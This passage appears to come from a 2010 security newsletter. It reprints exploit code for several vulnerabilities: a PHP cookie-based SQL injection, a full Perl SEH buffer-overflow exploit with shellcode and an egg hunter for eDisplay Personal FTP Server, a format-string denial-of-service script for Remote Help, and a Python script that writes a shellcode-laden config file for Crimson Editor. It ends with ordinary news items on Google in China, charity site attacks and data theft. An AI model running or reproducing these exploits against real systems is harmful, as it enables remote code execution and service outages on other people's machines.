          if ($CookieUsername != '' && $CookiePassword != '') {
              $query = "select
              RecordNumber,Level,Password,DisplayName,SessionLength from
              `".$Settings['DBPrefix']."core-Users` where
              Username='$CookieUsername' LIMIT 1";
              $result = mysql_query($query) or die (mysql_error());

      The cookie carries the login name and the password hash in the form login==hash_pass. Because $CookieUsername is placed in the query without any filtering, SQL injection is possible whenever magic_quotes_gpc is off.

    5. eDisplay Personal FTP Server is subject to a post-authentication stack buffer overflow vulnerability. Version 1.0.0 is impacted, though others may be as well.  Exploit code is available:
      print
      “|——————————————————————|n”;
      print “| __ __|n”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |n”;
      print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |n”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |n”;
      print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |n”;
      print “||n”;
      print “|http://www.corelan.be:8800 |n”;
      print “||n”;
      print “|————————————————-[ EIP Hunters]–|nn”;
      print ” –==[ Exploit for eDisplay Personal FTP Server 1.0.0]==–n”;
      print ” Author : corelanc0d3rnn”;

      use IO::Socket;
      if ($#ARGV ne 3) {
      print ” usage: $0 <targetip> <targetport> <user>
      <password>n”;
      exit(0);
      }

      my $user=$ARGV[2];
      my $pass=$ARGV[3];

      print ” [+] Preparing payloadn”;
      #basereg edi – custom MessageBox payload
      my $sc = “w00tw00t”.
      “WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABX”.
      “P8ABuJIn98kMKn9QdEtJTTqzrNRcJUaXI54lKBQfPLKPv”.
      “VlnkqfGlLKW6THLKQngPlKP6FXpOtXD5ZSryeQ8QKO8aa”.
      “pLKPlututNkW5WLLKSdUUcHS1yznk3zvxlK1J5pwqxkZC”.
      “P7qYLKP4NkFa8ndqkOUayPkLNLNdKppt4JJaXOTMfaJgI”.
      “yxqKOKOKO7KSLwT6HPuINNkcjGTuQzKBFLK6lpKNkcj7l”.
      “faJKLKVdLKC1KXk9QTEtULSQksnRtHwYXTk9kUOyKrCXl”.
      “NpNfnxl62kXOlKOio9ok9ReUTMk3NiHKR3CowuLUtPRjH”.
      “LKKOkOiooyW5WxCXrLBLQ0KOqxFSWBVNCTU8qeT3CUT2M”.
      “XclvD6joyivQFKOsevdoyYRRpOKoXLbPMMlOw5LDdrrjH”.
      “qNKO9o9oPhTn6NfNV8phdp0dEcSBU8BLCQrNcSqxPcrOR”.
      “RSUtqKkmX1LTdtONiysrHTnVNqHUp3Xq0gK4i6N3XBGSQ”.
      “1ypnphSYsDUppaQxsTqycTEpTqxImXPLtdFrMYkQP1Zrs”.
      “b3cPQrrkOn0DqIPbpKOQEeXA”;

      #custom encoded egg hunter
      #boy I love pvefindaddr !
      # !pvefindaddr encode ascii <bytes>
      #I only had to fix bad chars
      #but we need 5C to trigger SEH at correct offset
      my $decoder=
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx2Ex5Dx55x5D”.
      “x2Dx2Dx5Dx55x5D”.
      “x2Dx30x5Ex55x5D”.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx70x2Dx5Cx6F”. #we need these 5C’s !!
      “x2Dx70x2Cx5Cx6F”. #we need these 5C’s !!
      “x2Dx71x30x5Dx71″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx45x2Ex23x56″.
      “x2Dx45x2Dx23x56″.
      “x2Dx46x30x2Ex59″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx5Bx6Cx2Dx45″.
      “x2Dx5Bx6Cx2Dx45″.
      “x2Dx5Bx6Ex2Dx45″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx41x53x37x2E”.
      “x2Dx41x53x37x2D”.
      “x2Dx42x54x37x30″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx54x37x66x45″.
      “x2Dx54x37x66x45″.
      “x2Dx56x39x66x46″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx50x3Fx39x31″.
      “x2Dx50x3Fx39x31″.
      “x2Dx51x3Fx3Bx33″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx33x2Ax67x55″.
      “x2Dx33x2Ax67x55″.
      “x2Dx34x2Ax67x55″.
      “x50″.
      “x75x58″; #jump to decoded opcode

      my $buffer = “A” x 45;
      my $pad=(“D” x 30);
      my $nseh= “x61x42x42x42″;
      my $seh=pack(‘V’,0x202D2B3C); #comctl32.ocx 0x202D2B3C
      #encoded jumpback code to jump to encoded egg hunter
      #pfew that’s a mouthful
      my $jumpback=”x50x5c”;
      $jumpback=$jumpback.”x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx55x55x55x5E”.
      “x2Dx55x55x55x5E”.
      “x2Dx56x55x56x60″.
      “x50″.
      “x25x4Ax4Dx4Ex55″.
      “x25x35x32x31x2A”.
      “x2Dx2Ax5Cx59x54″.
      “x2Dx2Ax5Cx59x54″.
      “x2Dx2Bx5Dx59x56″.
      “x50″;
      my $rest = “A” x (1000 -
      length($buffer.$nseh.$seh.$decoder.$pad.$sc.$jumpback)-20-5);
      #align eax first
      my
      $aligneax=”x52x58x2dx35x55x55x55x2dx35x55x55x55x2dx35x55x55x55″;
      my
      $payload=$buffer.”CCCCCCCCCCCCCCCCCC”.$decoder.$pad.$nseh.$seh.&q
      uot;BBB”.$aligneax.$jumpback.$rest.$sc;
      print ” [+] Connecting to server $ARGV[0] on port $ARGV[1]n”;
      $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
      PeerPort => $ARGV[1],
      Proto => ‘tcp’);

      $ftp = <$sock> || die ” [!] *** Unable to connect ***n”;
      print ” ** $ftp”;
      print ” [+] Logging in (user $user)n”;
      print $sock “USER $userrn”;
      $ftp = <$sock>;
      print ” ** $ftp”;
      print $sock “PASS $passrn”;
      $ftp = <$sock>;
      print ” ** $ftp”;
      print ” [+] Sending payload (” . length($payload).”
      bytes)n”;
      print $sock “RMD “.$payload.”rrn”;
      print $sock “QUITrn”;

      print ” [+] Shellcode size : ” . length($sc).”
      bytesn”;

    6. Remote Help is subject to a remote denial of service vulnerability. Version 0.0.7 is impacted, though others may be as well.  Proof of Concept code is available:
      print
      “|——————————————————————|n”;
      print “| __ __|n”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |n”;
      print “| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |n”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |n”;
      print “| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |n”;
      print “||n”;
      print “|http://www.corelan.be:8800 |n”;
      print “||n”;
      print “|————————————————-[ EIP Hunters]–|nn”;
      print ” –==[ Exploit for eDisplay Personal FTP Server 1.0.0]==–n”;
      print “[+] DoS exploit for Remote Help 0.0.7 Httpn”;

      use IO::Socket;

      if ($#ARGV != 0) {
      print $#ARGV;
      print “n usage: $0 <targetip>n”;
      exit(0);
      }

      print “[+] Connecting to server $ARGV[0] on port 80nn”;

      $remote = IO::Socket::INET->new( Proto => “tcp”,
      PeerAddr => $ARGV[0],
      PeerPort => “http(80)”,
      );
      unless ($remote) { die “Cannot connect to Remote Help daemon on
      $ARGV[0]n” }
      print “[+] Connected!n”;

      #CONTROL EAX
      $payload = “/index.html” . “%x” x 90 . “A” x
      250 . “%x” x 186 .”%.999999x” x 15
      .”%.199999x” . “%nX” . “DCBA”;

      print “[+] Sending Malicious Requestn”;
      print $remote “GET $payload HTTP/1.1rn”;
      close $remote;

    7. Crimson Editor is subject to an SEH overwrite vulnerability. Version r3.70 is impacted, though others may be as well.  Proof of Concept code is available:
      print
      “|——————————————————————|&quot;;
      print “| __ __|”;
      print “| _________ ________ / /___ _____ / /____ ____ ________ |”;
      print “| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__|”;
      print “| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |”;
      print “| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/|”;
      print “||”;
      print “|http://www.corelan.be:8800 |”;
      print “||”;
      print “|————————————————-[ EIP Hunters]–|”;

      header =
      “x43x6Fx6Ex66x69x67x75x72x61x74x69x6Fx6Ex20x33x2Ex37x30x20x42x65x74x61
      x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x5Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x01x00x00x00x31x46x69x78x65x64x53x79x73x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65
      x72x64x61x6Ex61x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x01x00x00x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20
      x43x6Fx6Ex73x6Fx6Cx65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x31x54x65x72x6Dx69x6Ex61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x22x56x65x72x64x61x6Ex61x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00
      x00x22x41x72x69x61x6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x01x00x00x00x31x4Cx75x63x69x64x61x20x43x6Fx6Ex73x6Fx6C
      x65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72x69x65x72x20x4Ex65x77x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x31x43x6Fx75x72
      x69x65x72x20x4Ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01
      x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x04x00x00
      x00x64x00x00x00x04x00x00x00x19x00x00x00x20x00x00x00x00x00x00x00x04x00x00x00
      x00x00x00x00x00x00x00x00x06x00x00x00x50x00x00x00x64x00x00x00x64x00x00x00x64
      x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x01x00x00x00x0Bx00
      x00x00x24x28x46x69x6Cx65x4Ex61x6Dx65x29x00x00x00x00x1Cx00x00x00x24x28x50x61
      x67x65x4Ex75x6Dx62x65x72x29x20x2Fx20x24x28x54x6Fx74x61x6Cx50x61x67x65x29x0B
      x00x00x00x24x28x43x75x72x72x44x61x74x65x29x00x00x00x00x0Ex00x00x00x43x72x69
      x6Dx73x6Fx6Ex20x45x64x69x74x6Fx72x00x00x00x00x00x00x00x00x00x00x00x00x01x00
      x00x00x00x00x00x00x01x00x00x00x03x00x00x00x62x61x6Bx00x00x00x00x03x00x00x00
      x41x53x50x07x00x00x00x41x53x50x2Ex53x50x43x07x00x00x00x41x53x50x2Ex4Bx45x59
      x05x00x00x00x42x61x73x69x63x09x00x00x00x42x41x53x49x43x2Ex53x50x43x09x00x00
      x00x42x41x53x49x43x2Ex4Bx45x59x05x00x00x00x43x2Fx43x2Bx2Bx0Dx00x00x00x43x50
      x4Cx55x53x50x4Cx55x53x2Ex53x50x43x0Dx00x00x00x43x50x4Cx55x53x50x4Cx55x53x2E
      x4Bx45x59x03x00x00x00x43x53x53x07x00x00x00x43x53x53x2Ex53x50x43x07x00x00x00
      x43x53x53x2Ex4Bx45x59x07x00x00x00x46x6Fx72x74x72x61x6Ex0Dx00x00x00x46x4Fx52
      x54x52x41x4Ex37x37x2Ex53x50x43x0Dx00x00x00x46x4Fx52x54x52x41x4Ex37x37x2Ex4B
      x45x59x04x00x00x00x48x54x4Dx4Cx08x00x00x00x48x54x4Dx4Cx2Ex53x50x43x08x00x00
      x00x48x54x4Dx4Cx2Ex4Bx45x59x04x00x00x00x4Ax61x76x61x08x00x00x00x4Ax41x56x41
      x2Ex53x50x43x08x00x00x00x4Ax41x56x41x2Ex4Bx45x59x03x00x00x00x4Ax53x50x07x00
      x00x00x4Ax53x50x2Ex53x50x43x07x00x00x00x4Ax53x50x2Ex4Bx45x59x05x00x00x00x4C
      x61x54x65x58x09x00x00x00x4Cx41x54x45x58x2Ex53x50x43x09x00x00x00x4Cx41x54x45
      x58x2Ex4Bx45x59x06x00x00x00x4Dx61x74x6Cx61x62x0Ax00x00x00x4Dx41x54x4Cx41x42
      x2Ex53x50x43x0Ax00x00x00x4Dx41x54x4Cx41x42x2Ex4Bx45x59x06x00x00x00x50x61x73
      x63x61x6Cx0Ax00x00x00x50x41x53x43x41x4Cx2Ex53x50x43x0Ax00x00x00x50x41x53x43
      x41x4Cx2Ex4Bx45x59x04x00x00x00x50x65x72x6Cx08x00x00x00x50x45x52x4Cx2Ex53x50
      x43x08x00x00x00x50x45x52x4Cx2Ex4Bx45x59x03x00x00x00x50x48x50x07x00x00x00x50
      x48x50x2Ex53x50x43x07x00x00x00x50x48x50x2Ex4Bx45x59x06x00x00x00x50x4Cx2Fx53
      x51x4Cx09x00x00x00x50x4Cx53x51x4Cx2Ex53x50x43x09x00x00x00x50x4Cx53x51x4Cx2E
      x4Bx45x59x06x00x00x00x50x79x74x68x6Fx6Ex0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex53
      x50x43x0Ax00x00x00x50x59x54x48x4Fx4Ex2Ex4Bx45x59x06x00x00x00x54x63x6Cx2Fx54
      x6Bx09x00x00x00x54x43x4Cx54x4Bx2Ex53x50x43x09x00x00x00x54x43x4Cx54x4Bx2Ex4B
      x45x59x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
      x00x00x01x00x00x00x01x00x00x00x09x00x00x00x41x6Cx6Cx20x46x69x6Cx65x73x03x00
      x00x00x2Ax2Ex2Ax00x00x00x00x0Ax00x00x00x54x65x78x74x20x46x69x6Cx65x73x17x00
      x00x00x2Ax2Ex74x78x74x3Bx2Ax2Ex6Cx6Fx67x3Bx2Ax2Ex62x61x74x3Bx2Ax2Ex69x6Ex69
      x03x00x00x00x74x78x74x0Ax00x00x00x48x54x4Dx4Cx20x46x69x6Cx65x73x1Ax00x00x00
      x2Ax2Ex68x74x6Dx6Cx3Bx2Ax2Ex68x74x6Dx3Bx2Ax2Ex73x68x74x6Dx6Cx3Bx2Ax2Ex63x73
      x73x04x00x00x00x68x74x6Dx6Cx0Bx00x00x00x43x2Fx43x2Bx2Bx20x46x69x6Cx65x73x17
      x00x00x00x2Ax2Ex63x3Bx2Ax2Ex63x63x3Bx2Ax2Ex63x70x70x3Bx2Ax2Ex70x63x3Bx2Ax2E
      x68x03x00x00x00x63x70x70x0Ax00x00x00x4Ax61x76x61x20x46x69x6Cx65x73x0Cx00x00
      x00x2Ax2Ex6Ax61x76x61x3Bx2Ax2Ex6Ax61x76x04x00x00x00x6Ax61x76x61x0Ax00x00x00
      x50x65x72x6Cx20x46x69x6Cx65x73x16x00x00x00x2Ax2Ex70x6Cx3Bx2Ax2Ex70x6Dx3Bx2A
      x2Ex70x65x72x6Cx3Bx2Ax2Ex63x67x69x02x00x00x00x70x6Cx0Dx00x00x00x46x6Fx72x74
      x72x61x6Ex20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex66x3Bx2Ax2Ex66x6Fx72x3Bx2Ax2E
      x66x37x37x3Bx2Ax2Ex66x39x30x3Bx2Ax2Ex66x39x35x01x00x00x00x66x09x00x00x00x50
      x48x50x20x46x69x6Cx65x73x1Bx00x00x00x2Ax2Ex70x68x70x3Bx2Ax2Ex70x68x74x6Dx6C
      x3Bx2Ax2Ex70x68x70x33x3Bx2Ax2Ex70x68x70x34x03x00x00x00x70x68x70x09x00x00x00
      x4Ax53x50x20x46x69x6Cx65x73x14x00x00x00x2Ax2Ex6Ax73x70x3Bx2Ax2Ex6Ax68x74x6D
      x6Cx3Bx2Ax2Ex6Ax61x76x61x03x00x00x00x6Ax73x70x0Bx00x00x00x4Cx61x54x65x58x20
      x46x69x6Cx65x73x0Bx00x00x00x2Ax2Ex74x65x78x3Bx2Ax2Ex73x74x79x03x00x00x00x74
      x65x78″

      # calc.exe
      sc = (“x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49″
      “x43x43x43x43x43x43x51x5ax56x54x58x33x30x56″
      “x58x34x41x50x30x41x33x48x48x30x41x30x30x41″
      “x42x41x41x42x54x41x41x51x32x41x42x32x42x42″
      “x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a”
      “x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47″
      “x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c”
      “x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a”
      “x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46″
      “x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45″
      “x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c”
      “x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c”
      “x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44″
      “x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c”
      “x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46″
      “x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50″
      “x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44″
      “x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45″
      “x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43″
      “x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b”
      “x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43″
      “x51x42x4cx42x43x43x30x41x41″);

      crash = “x41″ * 7147 #7947
      crash += “x90″ * 20
      crash += sc
      crash += “x41″ * (7947-len(crash))
      crash += “xe9xe0xfcxffxff”
      crash += “xebxf9x90x90″
      crash += “xbdx32x46x00″ # [cedt.exe]

      exploit = header + crash
      pwnfile = open(‘cedt.cfg’,'w’);
      pwnfile.write(exploit);
      pwnfile.close()

Stories of Interest:
News item 1: http://www.dvhardware.net/article41781.html
After weeks of unfruitful negotiations with Chinese authorities, Google has stopped censoring results on its Chinese search engine. Starting today, visitors of the Internet giant’s Chinese website are redirected to the Google’s Hong Kong site, which offers Chinese-language service with uncensored results.

Google announced in January that it had traced a sophisticated cyber-attack to China, and as a result would no longer filter results in its Chinese search service. Google acknowledged that the move could result in having to withdraw from direct competition in China, where Internet search sites are required to censor politically sensitive topics.

Since then, Google has sought to engage with Chinese authorities over how it could operate in the country without filtering results. Theoretically, China-based users could continue to connect to sites such as google.com or google.com.hk following the company’s shuttering of google.cn, though their access could become unreliable.

A Chinese government official in charge of the Internet bureau under the State Council Information Office responded to Google, accusing the search engine of having “violated its written promise” and of being “totally wrong” in stopping the censoring of its Chinese search results and blaming the Chinese government for alleged hacker attacks:

“Google has violated its written promise it made when entering the Chinese market by stopping filtering its searching service and blaming China in insinuation for alleged hacker attacks,” said the official.

“This is totally wrong. We’re uncompromisingly opposed to the politicization of commercial issues, and express our discontent and indignation to Google for its unreasonable accusations and conducts,” the official said.

News item 2:http://www.stuff.co.nz/technology/3486923/Hackers-crash-Aussie-charity-websites
The internet services of two Australian autism support organizations have been crashed by computer hackers and a third may also have fallen victim, raising fears of a targeted attack to coincide with autism month.

Autism Spectrum Australia (ASPECT), the country’s autism service provider, is losing hundreds of dollars in online donations each day after its website was hit by hackers early on Sunday. The hackers closed web forums, a group email service and registration pages for events.

The codeword-restricted intranet site for the autism training organisation Positive Partnerships was also hit. Autism Victoria’s intranet service also went down.

The first two attacks were traced to IP addresses in the United States and experts said they appeared to be deliberate.

News item 3: http://joongangdaily.joins.com/article/view.asp?aid=2918142
A 22-year-old Korean man named Kim is under arrest for purchasing lists of Koreans’ personal information, such as cell phone numbers and e-mail addresses, which had been hacked in China. After spending 1 million won ($880) for 31 million items of data since July of last year, Kim posted an Internet ad and sold off 10 million such items.

A 27-year-old man Lee, who runs a branch for an Internet service provider, was one of the buyers. He spent 3 million won for 140,000 phone numbers for his branch’s telemarketing scheme.

The Seoul Metropolitan Police Agency took in Kim and Lee without physical detention, and also detained the owners of the companies that failed to protect their customer information from computer hackers.

Last September, a used-car trading Web site and the Internet home page for a car navigation manufacturer were victims of Chinese hackers who stole names and residential registration numbers of 910,000 online members. Hackers can use the stolen registration numbers to become members of certain Web sites that send spam messages, or sell the numbers to other hackers.

Seoul police charged a 32-year-old named Kim, the owner of the used-car site, and a 45-year-old named Lee, who runs the navigation maker, for negligence in protecting their customers’ information. The law demands that companies protect their online customers’ information, and violations are punishable by a maximum of two years in prison or a 10 million won fine.

News item 4:  http://news.cnet.com/8301-1009_3-20000884-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Google has released an open-source Web security scanner called Skipfish that is designed to allow people to scan Web applications for security holes.

The tool scans a Web application for flaws including “tricky scenarios” such as blind SQL or XML injection, Google developer Michal Zalewski said in the Skipfish wiki.

Skipfish prepares a site map annotated with interactive crawl results, highlighting flaws, after a recursive crawl and dictionary-based probing of the target site. The tool can also generate a final report that can be used as a basis for a security assessment.

News item 5: http://theappleblog.com/2010/03/22/10-6-3-is-imminent%E2%80%A6maybe-the-malwares-not-far-behind/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheAppleBlog+%28TheAppleBlog%29
Here is the full rundown of features and fixes we can expect in 10.6.3:

  • Compatibility issues with OpenGL-based applications
  • Performance improvements for 64-bit Logic
  • Changes to QuickTime X that increase reliability and improve compatibility and security
  • Printing reliability and compatibility with third-party printers
  • Issues resolved that prevented files from copying to Windows shares
  • Issues resolved with recurring events in iCal when connected to an Exchange server
  • Issues resolved that prevented files with the “#” or “&” symbols in their names from opening in Rosetta
  • Issues addressed that caused background message colors to display incorrectly in Mail when scrolling
  • Issue resolved that caused machines using BTMM and the Bonjour Sleep Proxy to wake unexpectedly

News item 6:  http://www.theinquirer.net/inquirer/news/1597220/mac-os-x-zero-day-flaws
Security researcher Charlie Miller, who is already known for having discovered a number of bugs in Mac OS X, told Heise Security that the holes are found in closed source Apple products.

He said that the attack surface of OS X is so wide you can land a 747 on it, sideways.  There are bugs in the open source components and vulnerabilities in the closed source third-party and Apple components. All of which can lead to remote compromise of the Mac OS X operating system.

